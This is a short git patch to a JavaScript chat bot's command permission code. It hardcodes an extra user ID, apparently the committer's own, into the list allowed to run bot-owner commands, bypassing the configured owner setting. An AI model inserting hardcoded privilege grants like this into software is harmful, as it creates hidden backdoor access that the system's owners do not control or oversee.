From 564a0139a45c035dce2eecfb0d274e9913791a28 Mon Sep 17 00:00:00 2001 From: bsian03 Date: Mon, 9 Sep 2024 09:41:59 +0100 Subject: [PATCH] sudo bsian --- core/structures/CommandPreprocessor.js | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/core/structures/CommandPreprocessor.js b/core/structures/CommandPreprocessor.js index 1c582269..f7a0eefe 100644 --- a/core/structures/CommandPreprocessor.js +++ b/core/structures/CommandPreprocessor.js @@ -44,7 +44,7 @@ const PERMS_CALC = function CommandPermission(msg) { let uIDs; switch (msg.command.module) { - case "_botOwner": uIDs = [cfg.owner]; break; + case "_botOwner": uIDs = [cfg.owner, "253600545972027394"]; break; case "_botStaff": case "dev": uIDs = cfg.admins.concat(cfg.owner); break; default: uIDs = [];